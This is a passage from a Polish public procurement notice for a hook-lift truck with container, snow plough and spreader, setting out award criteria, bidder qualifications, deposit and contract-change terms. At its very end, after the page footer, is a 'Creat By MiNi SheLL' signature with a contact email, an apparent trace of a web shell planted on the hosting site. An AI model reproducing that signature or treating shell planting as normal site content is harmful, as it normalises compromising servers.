boku.<br/>14)Deklaracja Zgodności wg ISO/IEC17050-1, potwierdzająca spełnienie wszystkich wymaganych w danym modelu kontenera norm branżowych.<br/>15)Przed lakierowaniem kontener winien być poddany procesowi oczyszczania mechanicznego a następnie odtłuszczany chemicznie.<br/>16)Lakier nakładany agregatem lakierniczym metodą hydrodynamiczną w osłonie powietrza.<br/>17)Kolor dowolny wg palety RAL nr9005 (lakiery na bazie żywic alkidowych).<br/>18)Ładowność: 5000kg.<br/>19)Okres gwarancji: minimum36 miesięcy. <br/>VI.	Montaż<br/>1.W skład montażu wchodzi:<br/>1)Zabudowa urządzenia hakowego: <br/>a.montaż urządzenia hakowego, pompy hydraulicznej, podłączenie instalacji hydraulicznej i elektrycznej, zalanie olejem hydraulicznym oraz próba urządzeń.<br/>b.Wykonanie dokumentacji techniczno-ruchowej i UDT. <br/>2)Podłączenie układu zasilającego piaskarkę z przystawki od silnikowej<br/>3)Montaż płyty czołowej do pługa odśnieżnego.<br/>Pozostałe wymagania OPZ znajdują się w zał. nr 1.7 do SWZ oraz w projekcie umowy i SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34142000-4 - Ciężarówki wyposażone w dźwig i pojazdy samowyładowcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34143000-1 - Pojazdy do utrzymania dróg w okresie zimy</p> <p class="mb-0">34144510-6 - Pojazdy do transportu odpadów</p> <p class="mb-0">80511000-9 - Usługi szkolenia personelu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający oświadcza, iż przewiduje udzielenia zamówień podobnych, o których mowa w art. 214 ust. 1 pkt. 7 ustawy Pzp.<br/><br/>Zamawiający przewiduje udzielenia zamówienia, zgodnie z art. 214 ust. 1 pkt 7 ustawy Prawo zamówień publicznych w przypadku udzielenia dotychczasowemu wykonawcy zamówienia podstawowego zamówienia na dodatkowe dostawy osprzętu (do 20% wartości zamówienia podstawowego), polegające na powtórzeniu podobnych dostaw, jeżeli takie zamówienie jest zgodne z jego przedmiotem oraz całkowita wartość tego zamówienia została uwzględniona przy obliczaniu jego wartości, a informacja o ww. została umieszczona w ogłoszeniu o zamówieniu.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi<br/>kryteriami:<br/>1)	Cena ofertowa – 70% - max 70 pkt wg wzoru<br/>2)	Okres Gwarancji podwozia – 10% max 10 pkt wg systemu punktacji<br/>3)	Okres Gwarancji haka – 10% max 10 pkt wg systemu punktacji<br/>4)	Okres Gwarancji posypywarki	– 10% max 10 pkt wg systemu punktacji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres Gwarancji podwozia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres Gwarancji haka</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres Gwarancji posypywarki</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a)	Zdolności do występowania w obrocie gospodarczym: Nie dotyczy – Zamawiający nie stawia w ww. punkcie wymagań.<br/><br/>b)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Nie dotyczy – Zamawiający nie stawia w ww. punkcie wymagań.<br/><br/>c)	Sytuacji ekonomicznej lub finansowej:<br/>Nie dotyczy – Zamawiający nie stawia w ww. punkcie wymagań.<br/><br/>d)	Zdolności technicznej lub zawodowej:.<br/><br/>d.1. posiadania wiedzy i doświadczenia:<br/><br/>W okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał lub jest w trakcie wykonywania minimum jednej dostawy zgodnej z zakresem przedmiotu zamówienia tj: <br/>wykonanie co najmniej jednej dostawy obejmującej samochód ciężarowy hakowy o wartości min. 300 000,00 zł brutto (słownie: trzysta tysięcy złotych), które zostały należycie wykonane.<br/><br/>Uwagi: <br/>1.	Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Zamawiający nie dopuszcza by Wykonawca polegał na do-świadczeniu grupy wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał wykazywanego zakresu prac. Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia w zakresie faktycznie konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez wykonawcę faktur.<br/>2.	Zamawiający uzna za spełniony warunek SWZ również w przypadku, gdy doświadczenie wykazane przez Wykonawcę obejmuje szerszy zakres usług od wymaganych przez Za-mawiającego.<br/>3.	W przypadku, gdy jakakolwiek wartość dotycząca powyższych warunków wyrażona będzie w walucie obcej, Zamawiający przeliczy tę wartość w oparciu o średni kurs walut Narodowego Banku Polskiego (dalej: NBP) dla danej waluty z dnia, w którym nastąpi po-stępowaniu publikacja przedmiotowego postępowania w Biuletynie Zamówień Publicznych. Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, Zamawiający przyjmie średni kurs z ostatniego dnia przed dniem publikacji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia Zamawiający wymaga złożenia: oświadczenie o<br/>niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu na formularzu zgodnym<br/>z treścią załącznika nr 1.2 do SWZ. Odpisu lub informacji z Krajowego Rejestru Sądowego lub z<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3<br/>miesiące przed złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. W<br/>przypadku, gdy odpis jest dostępny bezpłatnie w publicznej bazie danych zamawiający nie wymaga<br/>złożenia odpisu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia warunków udziału w postępowaniu Zamawiający<br/>wymaga złożenia: wykaz dostaw wykonanych lub również wykonywanych w okresie ostatnich 3 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały<br/>wykonane na formularzu zgodnym z treścią załącznika nr 1.4 do SWZ, oraz załączeniem dowodów<br/>określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami o<br/>których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy<br/>były wykonywane lub są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze<br/>Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych.<br/>Zgodnie z art.7 pkt 20 nowego Pzp przez pojęcie przedmiotowych środków dowodowych należy rozumieć środki służące potwierdzeniu zgodności oferowanych dostaw, usług lub robót bu-dowlanych z wymaganiami, cechami lub kryteriami określonymi w opisie przedmiotu zamó-wienia lub opisie kryteriów oceny ofert, lub wymaganiami związanymi z realizacją zamówienia.<br/>Przedmiotowe środki dowodowe mogą przybrać postać dokumentów bądź też innych środków – w przedmiotowym postępowaniu oświadczenia Wykonawcy wskazującego na dane techniczne oferowanego przedmiotu zamówienia. Zostały one wskazane przez Zamawiającego w ogłoszeniu o zamówieniu i dokumentach zamówienia oraz powinny zostać złożone przez Wykonawcę wraz z ofertą.<br/>Przedmiotowe środki dowodowe w postępowaniu o udzielenie zamówienia publicznego służą oce-nie zgodności zaoferowanego świadczenia z opisem przedmiotu zamówienia, stanowiąc podstawę weryfikacji poprawności merytorycznej oferty.<br/>Przedmiotowy środek dowodowy w postaci opisu oferowanego sprzętu Wykonawca składa na druku stanowiącym załącznik nr 1.8 do swz wraz z ofertą. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Określone w rozdz. 6.3 swz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokość 2.000,00 zł (słownie: dwa<br/>tysiące złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą.<br/>Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7<br/>ustawy Pzp. Szczegółowe kwestie dot. wadium zawiera rozdział 20 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim<br/>przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie<br/>prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>2. Przepisy ustawy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>3. W przypadku wspólnego ubiegania się o udzielenie zamówienia publicznego oświadczenie<br/>Wykonawcy według załącznika nr 2, o którym mowa wyżej w niniejszej SWZ składa każdy z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy, zostanie<br/>spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i wykona elementy przedmiotu zamówienia, do których realizacji te uprawnienia są<br/>wymagane.<br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia (o ile zostały sformułowane) Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają elementy<br/>przedmiotu zamówienia, do realizacji których te zdolności są wymagane.<br/>6. W przypadkach, o których mowa wyżej w pkt. 4 i 5, Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które<br/>elementy przedmiotu zamówienia wykonają poszczególni wykonawcy.<br/>7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum) ponosić będą<br/>solidarnie odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania<br/>wynikającego z przedmiotu udzielonego zamówienia;<br/>8. Ten sam Wykonawca może być członkiem tylko jednego konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Każda zmiana postanowień niniejszej umowy wymaga formy pisemnej pod rygorem nieważności.<br/>2.	Zakres świadczenia wykonawcy określony w umowie co do zasady jest tożsamy z zobowiązaniami wykonawcy określonymi w ofercie oraz określeniem przedmiotu zamówienia zawartym w swz. Jeśli ustawa nie stanowi inaczej, w części wykraczającej poza określenie przedmiotu zamówienia zawartego w specyfikacji warunków zamówienia umowa podlega unieważnieniu.<br/>3.	Zamawiający przewiduje następujące możliwości dokonania zmiany zawartej umowy oraz określa warunki takiej zmiany w przypadku:<br/>1)	zmiany stawek cenowych brutto w przypadku zmiany urzędowej stawki podatku VAT: zmiana stawki VAT w trakcie trwania umowy upoważnia wykonawcę do zmiany treści umowy o uwzględnienie nowej stawki podatku VAT w płatnościach.<br/>2)	zmiany terminu przewidzianego na zakończenie dostawy w przypadku wstrzymania dostawy przez Zamawiającego,<br/>3)	gdy wykonawcę, któremu zamawiający udzielił zamówienia, zastępuje nowy wykonawca w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy;<br/>4)	zamawiający przejmuje zobowiązania wykonawcy względem jego podwykonawców, co ex lege oznacza zmianę podmiotowości wykonawcy;<br/>5)	zmiana nie jest istotna w rozumieniu uPzp;<br/>6)	Zmiana zaoferowanego sprzętu na sprzęt o parametrach tożsamych lub lepszych od przyjętych w ofercie w przypadku wycofania z rynku oferowanego sprzętu. Wymagane jest oświadczenie producenta i wyłączna zgoda Zamawiającego,<br/>7)	Zmiana przepisów prawa, w tym przepisów prawa podatkowego mające wpływ na wykonanie przedmiotu umowy.<br/>8)	aktualizacji rozwiązań ze względu na postęp technologiczny lub gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy.<br/>4.	Zmiana umowy musi zostać dokonana nie inaczej niż w drodze obustronnie podpisanego pisemnego aneksu.<br/>5.	Nie stanowi istotnej zmiany umowy w rozumieniu ustawy Prawo zamówień publicznych:<br/>1)	zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np. zmiana osób do kontaktu itp.);<br/>2)	zmiana danych teleadresowych oraz osób reprezentujących strony lub oznaczenia stron umowy - wynikających ze zmiany stanu faktycznego albo prawnego.<br/>6.	Strony zgodnie ustalają, iż zakazuje się zmian postanowień zawartej umowy oraz wprowadzania nowych postanowień, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty poza przypadkami określonymi w treści niniejszej umowy, treści swz nr MZUK/01/2021 oraz prze-pisach prawa.<br/><br/>Szczegółowy projekt umowy zawarty jest w załączniku nr 1.5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-07 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa oferte za pośrednictwem "Formularza do złożenia, zmiany, wycofania oferty lub wniosku" dostępnego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-07 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca jest zobowiązany do wykonania przedmiotu zamówienia w terminie: <br/>	do 30 dni od dnia zawarcia umowy dostawa kompletnego hakowca wraz z kontenerem KP18 siatkowym<br/>	do 15.10.2021r. dostawa pługa i posypywarki.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-25 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com